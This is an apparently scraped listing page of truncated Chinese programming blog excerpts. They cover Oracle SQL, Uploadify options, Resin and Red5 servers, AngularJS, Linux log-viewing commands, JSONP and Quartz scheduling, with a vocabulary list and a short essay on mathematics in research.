下面所有的操作都是在表建立后操作的,主要目的就是熟悉sql的约束,约束语句的万能公式
1,增加字段(student表中增加 姓名字段)
alter table 增加字段的表名 add 增加的字段名 增加字段的数据类型
alter table student add name varchar2(10);
&nb
Uploadify 3.2 参数属性、事件、方法函数详解
bijian1013
JavaScript uploadify
一.属性
属性名称
默认值
说明
auto
true
设置为true当选择文件后就直接上传了,为false需要点击上传按钮才上传。
buttonClass
”
按钮样式
buttonCursor
‘hand’
鼠标指针悬停在按钮上的样子
buttonImage
null
浏览按钮的图片的路
精通Oracle10编程SQL(16)使用LOB对象
bijian1013
oracle 数据库 plsql
/*
*使用LOB对象
*/
--LOB(Large Object)是专门用于处理大对象的一种数据类型,其所存放的数据长度可以达到4G字节
--CLOB/NCLOB用于存储大批量字符数据,BLOB用于存储大批量二进制数据,而BFILE则存储着指向OS文件的指针
/*
*综合实例
*/
--建立表空间
--#指定区尺寸为128k,如不指定,区尺寸默认为64k
CR
【Resin一】Resin服务器部署web应用
bit1129
resin
工作中,在Resin服务器上部署web应用,通常有如下三种方式:
配置多个web-app
配置多个http id
为每个应用配置一个propeties、xml以及sh脚本文件
配置多个web-app
在resin.xml中,可以为一个host配置多个web-app
<cluster id="app&q
red5简介及基础知识
白糖_
基础
简介
Red5的主要功能和Macromedia公司的FMS类似,提供基于Flash的流媒体服务的一款基于Java的开源流媒体服务器。它由Java语言编写,使用RTMP作为流媒体传输协议,这与FMS完全兼容。它具有流化FLV、MP3文件,实时录制客户端流为FLV文件,共享对象,实时视频播放、Remoting等功能。用Red5替换FMS后,客户端不用更改可正
angular.fromJson
boyitech
AngularJS AngularJS 官方API AngularJS API
angular.fromJson 描述: 把Json字符串转为对象 使用方法: angular.fromJson(json); 参数详解: Param Type Details json
string
JSON 字符串 返回值: 对象, 数组, 字符串 或者是一个数字 示例:
<!DOCTYPE HTML>
<h
java-颠倒一个句子中的词的顺序。比如: I am a student颠倒后变成:student a am I
bylijinnan
java
public class ReverseWords {
/**
* 题目:颠倒一个句子中的词的顺序。比如: I am a student颠倒后变成:student a am I.词以空格分隔。
* 要求:
* 1.实现速度最快,移动最少
* 2.不能使用String的方法如split,indexOf等等。
* 解答:两次翻转。
*/
publ
web实时通讯
Chen.H
Web 浏览器 socket 脚本
关于web实时通讯,做一些监控软件。
由web服务器组件从消息服务器订阅实时数据,并建立消息服务器到所述web服务器之间的连接,web浏览器利用从所述web服务器下载到web页面的客户端代理与web服务器组件之间的socket连接,建立web浏览器与web服务器之间的持久连接;利用所述客户端代理与web浏览器页面之间的信息交互实现页面本地更新,建立一条从消息服务器到web浏览器页面之间的消息通路
[基因与生物]远古生物的基因可以嫁接到现代生物基因组中吗?
comsci
生物
大家仅仅把我说的事情当作一个IT行业的笑话来听吧..没有其它更多的意思
如果我们把大自然看成是一位伟大的程序员,专门为地球上的生态系统编制基因代码,并创造出各种不同的生物来,那么6500万年前的程序员开发的代码,是否兼容现代派的程序员的代码和架构呢?
oracle 外部表
daizj
oracle 外部表 external tables
oracle外部表是只允许只读访问,不能进行DML操作,不能创建索引,可以对外部表进行的查询,连接,排序,创建视图和创建同义词操作。
you can select, join, or sort external table data. You can also create views and synonyms for external tables. Ho
aop相关的概念及配置
daysinsun
AOP
切面(Aspect):
通常在目标方法执行前后需要执行的方法(如事务、日志、权限),这些方法我们封装到一个类里面,这个类就叫切面。
连接点(joinpoint)
spring里面的连接点指需要切入的方法,通常这个joinpoint可以作为一个参数传入到切面的方法里面(非常有用的一个东西)。
通知(Advice)
通知就是切面里面方法的具体实现,分为前置、后置、最终、异常环
初一上学期难记忆单词背诵第二课
dcj3sjt126com
english word
middle 中间的,中级的
well 喔,那么;好吧
phone 电话,电话机
policeman 警察
ask 问
take 拿到;带到
address 地址
glad 高兴的,乐意的
why 为什么
China 中国
family 家庭
grandmother (外)祖母
grandfather (外)祖父
wife 妻子
husband 丈夫
da
Linux日志分析常用命令
dcj3sjt126com
linux log
1.查看文件内容
cat
-n 显示行号 2.分页显示
more
Enter 显示下一行
空格 显示下一页
F 显示下一屏
B 显示上一屏
less
/get 查询"get"字符串并高亮显示 3.显示文件尾
tail
-f 不退出持续显示
-n 显示文件最后n行 4.显示头文件
head
-n 显示文件开始n行 5.内容排序
sort
-n 按照
JSONP 原理分析
fantasy2005
JavaScript jsonp jsonp 跨域
转自 http://www.nowamagic.net/librarys/veda/detail/224
JavaScript是一种在Web开发中经常使用的前端动态脚本技术。在JavaScript中,有一个很重要的安全性限制,被称为“Same-Origin Policy”(同源策略)。这一策略对于JavaScript代码能够访问的页面内容做了很重要的限制,即JavaScript只能访问与包含它的
使用connect by进行级联查询
234390216
oracle 查询 父子 Connect by 级联
使用connect by进行级联查询
connect by可以用于级联查询,常用于对具有树状结构的记录查询某一节点的所有子孙节点或所有祖辈节点。
来看一个示例,现假设我们拥有一个菜单表t_menu,其中只有三个字段:
一个不错的能将HTML表格导出为excel,pdf等的jquery插件
jackyrong
jquery插件
发现一个老外写的不错的jquery插件,可以实现将HTML
表格导出为excel,pdf等格式,
地址在:
https://github.com/kayalshri/
下面看个例子,实现导出表格到excel,pdf
<html>
<head>
<title>Export html table to excel an
UI设计中我们为什么需要设计动效
lampcy
UI UI设计
关于Unity3D中的Shader的知识
首先先解释下Unity3D的Shader,Unity里面的Shaders是使用一种叫ShaderLab的语言编写的,它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader,都是指用ShaderLab编写的代码,
如何禁止页面缓存
nannan408
html jsp cache
禁止页面使用缓存~
------------------------------------------------
jsp:页面no cache:
response.setHeader("Pragma","No-cache");
response.setHeader("Cache-Control","no-cach
以代码的方式管理quartz定时任务的暂停、重启、删除、添加等
Everyday都不同
定时任务管理 spring-quartz
【前言】在项目的管理功能中,对定时任务的管理有时会很常见。因为我们不能指望只在配置文件中配置好定时任务就行了,因为如果要控制定时任务的 “暂停” 呢?暂停之后又要在某个时间点 “重启” 该定时任务呢?或者说直接 “删除” 该定时任务呢?要改变某定时任务的触发时间呢? “添加” 一个定时任务对于系统的使用者而言,是不太现实的,因为一个定时任务的处理逻辑他是不
EXT实例
tntxia
ext
(1) 增加一个按钮
JSP:
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
Stri
数学学习在计算机研究领域的作用和重要性
xjnine
Math
最近一直有师弟师妹和朋友问我数学和研究的关系,研一要去学什么数学课。毕竟在清华,衡量一个研究生最重要的指标之一就是paper,而没有数学,是肯定上不了世界顶级的期刊和会议的,这在计算机学界尤其重要!你会发现,不论哪个领域有价值的东西,都一定离不开数学!在这样一个信息时代,当google已经让世界没有秘密的时候,一种卓越的数学思维,绝对可以成为你的核心竞争力. 无奈本人实在见地